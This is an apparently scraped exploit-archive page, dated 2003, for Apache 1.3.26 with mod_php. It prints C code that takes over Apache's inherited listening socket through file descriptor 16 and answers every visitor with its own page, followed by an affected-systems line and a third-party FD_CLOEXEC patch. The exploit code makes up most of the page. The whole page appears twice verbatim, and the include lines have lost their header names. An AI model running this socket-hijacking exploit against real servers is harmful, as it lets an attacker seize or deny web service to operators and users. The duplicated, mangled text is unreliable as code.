Exploits: Apache mod_php Exploit
Datum: 19.08.2003
--------------------------------------------------------

/* TCP Example code by Kien Pham (Heavily documented to help others understand.)
This code is now in Public Domain.
Look ma, I did this all by myself.

This proggie was taken somewhere from the net as a socket example
Changed a little for interaction with mod_php -- georgi
*/

#include // Include these for socket(), connect(), bind(), etc.
#include
#include // Include this for getprotobyname()
#include // Include this for memset()
#include // Include this for htonl(), htons(), etc.
#include

#define PORT 2000

#define THEFD 16

#define INSIZE 20000

void servermsux()
{
// Variables for the server component of the application.

int file_descriptor; // File descriptor that represents the server socket.
struct sockaddr_in server_address; // Really only contains the port we want to listen on.
int inbound_connection; // File descriptor that represents the socket of the inbound connection.
struct sockaddr_in inbound_address; // Address of the inbound connection.
int inbound_address_size; // Size of the structure for the inbound connection.
unsigned char *address_holder; // Pointer to simplify the extraction of IP addresses.
char message[]="HTTP/1.1 200 OK\nContent-Type: text/html\n\n"
"
Hi
MSUX
"; // Constant string to send to the client.
char buffer[INSIZE]; // Buffer to hold incoming data from the client.

// Code for the server component begins here.

file_descriptor=dup(THEFD);

if (file_descriptor<0) // Check to see if there was a failure in allocation.
{
perror("Server: socket()");
return;
}
if (close(THEFD) == -1) {perror("close");return; };
close(1);close(3);
while(42)
{
memset((void*)&inbound_address, 0, sizeof(inbound_address));
inbound_address.sin_family=AF_INET;
inbound_address_size=sizeof(inbound_address); // Make sure you do this, or the inbound_address will not be filled with information about the incomming address.
inbound_connection=accept(file_descriptor, (struct sockaddr*)&inbound_address, &inbound_address_size); // Grab the first socket that represents the client that has connected. If none yet, block and wait till somebody does.
if (inbound_connection<0)
{
perror("2 accept()");
return;
}
address_holder=(unsigned char*)&inbound_address.sin_addr.s_addr; // Save ourselves a call to the OS to convert.

if (read(inbound_connection, buffer, INSIZE)<0) // Read from the client.
{
perror("2 Server: read()");
return;
}

if (write(inbound_connection, message, sizeof(message))<0) // Write the message to the client.
{
perror("2 Server: write()");
return;
}
close(inbound_connection); // Tell the OS to clean up and free resources that we have used.
} //while
close(file_descriptor);
}


int main(void)
{
printf("\n2 TCP Networking Injection Example\n");
// printf("Written by Kien Pham\n");
// printf("For the Networking mini-Tutorial (http://www.tripod.com/~Xengren)\n");
if (!fork())
servermsux();

}
/*----end-------*/

受影响系统：

Apache Group Apache 1.3.26


解决方案：

目前厂商还没有提供补丁或者升级程序，Georage Guninski提供如下第三方补丁：

*** src/main/http_main.c.old Sun Oct 20 14:13:47 2002
--- src/main/http_main.c Sun Oct 20 14:44:18 2002
*************** static int make_sock(pool *p, const stru
*** 3784,3792 ****
--- 3784,3795 ----
GETPRIVMODE();
#endif

+ if (fcntl(s,F_SETFD,FD_CLOEXEC)== -1) ap_log_error(APLOG_MARK, APLOG_CRIT,
server_conf, "make_sock: could not do F_SETFD");
if (bind(s, (struct sockaddr *) server, sizeof(struct sockaddr_in)) == -1) {
ap_log_error(APLOG_MARK, APLOG_CRIT, server_conf,
"make_sock: could not bind to %s", addr);
+ // by georgi
+
#ifdef MPE
if (ntohs(server->sin_port) < 1024)
GETUSERMODE();
* TCP Example code by Kien Pham (Heavily documented to help others understand.)
This code is now in Public Domain.
Look ma, I did this all by myself. */

/*
This proggie was taken somewhere from the net as a socket example
Changed a little for interaction with mod_php -- georgi
*/

#include // Include these for socket(), connect(), bind(), etc.
#include
#include // Include this for getprotobyname()
#include // Include this for memset()
#include // Include this for htonl(), htons(), etc.
#include

#define PORT 2000

#define THEFD 16

#define INSIZE 20000

void servermsux()
{
// Variables for the server component of the application.

int file_descriptor; // File descriptor that represents the server socket.
struct sockaddr_in server_address; // Really only contains the port we want to listen on.
int inbound_connection; // File descriptor that represents the socket of the inbound connection.
struct sockaddr_in inbound_address; // Address of the inbound connection.
int inbound_address_size; // Size of the structure for the inbound connection.
unsigned char *address_holder; // Pointer to simplify the extraction of IP addresses.
char message[]="HTTP/1.1 200 OK\nContent-Type: text/html\n\n"
"
Hi
MSUX
"; // Constant string to send to the client.
char buffer[INSIZE]; // Buffer to hold incoming data from the client.

// Code for the server component begins here.

file_descriptor=dup(THEFD);

if (file_descriptor<0) // Check to see if there was a failure in allocation.
{
perror("Server: socket()");
return;
}
if (close(THEFD) == -1) {perror("close");return; };
close(1);close(3);
while(42)
{
memset((void*)&inbound_address, 0, sizeof(inbound_address));
inbound_address.sin_family=AF_INET;
inbound_address_size=sizeof(inbound_address); // Make sure you do this, or the inbound_address will not be filled with information about the incomming address.
inbound_connection=accept(file_descriptor, (struct sockaddr*)&inbound_address, &inbound_address_size); // Grab the first socket that represents the client that has connected. If none yet, block and wait till somebody does.
if (inbound_connection<0)
{
perror("2 accept()");
return;
}
address_holder=(unsigned char*)&inbound_address.sin_addr.s_addr; // Save ourselves a call to the OS to convert.

if (read(inbound_connection, buffer, INSIZE)<0) // Read from the client.
{
perror("2 Server: read()");
return;
}

if (write(inbound_connection, message, sizeof(message))<0) // Write the message to the client.
{
perror("2 Server: write()");
return;
}
close(inbound_connection); // Tell the OS to clean up and free resources that we have used.
} //while
close(file_descriptor);
}


int main(void)
{
printf("\n2 TCP Networking Injection Example\n");
// printf("Written by Kien Pham\n");
// printf("For the Networking mini-Tutorial (http://www.tripod.com/~Xengren)\n");
if (!fork())
servermsux();

}
/*----end-------*/

受影响系统：

Apache Group Apache 1.3.26


解决方案：

目前厂商还没有提供补丁或者升级程序，Georage Guninski提供如下第三方补丁：

*** src/main/http_main.c.old Sun Oct 20 14:13:47 2002
--- src/main/http_main.c Sun Oct 20 14:44:18 2002
*************** static int make_sock(pool *p, const stru
*** 3784,3792 ****
--- 3784,3795 ----
GETPRIVMODE();
#endif

+ if (fcntl(s,F_SETFD,FD_CLOEXEC)== -1) ap_log_error(APLOG_MARK, APLOG_CRIT,
server_conf, "make_sock: could not do F_SETFD");
if (bind(s, (struct sockaddr *) server, sizeof(struct sockaddr_in)) == -1) {
ap_log_error(APLOG_MARK, APLOG_CRIT, server_conf,
"make_sock: could not bind to %s", addr);
+ // by georgi
+
#ifdef MPE
if (ntohs(server->sin_port) < 1024)
GETUSERMODE();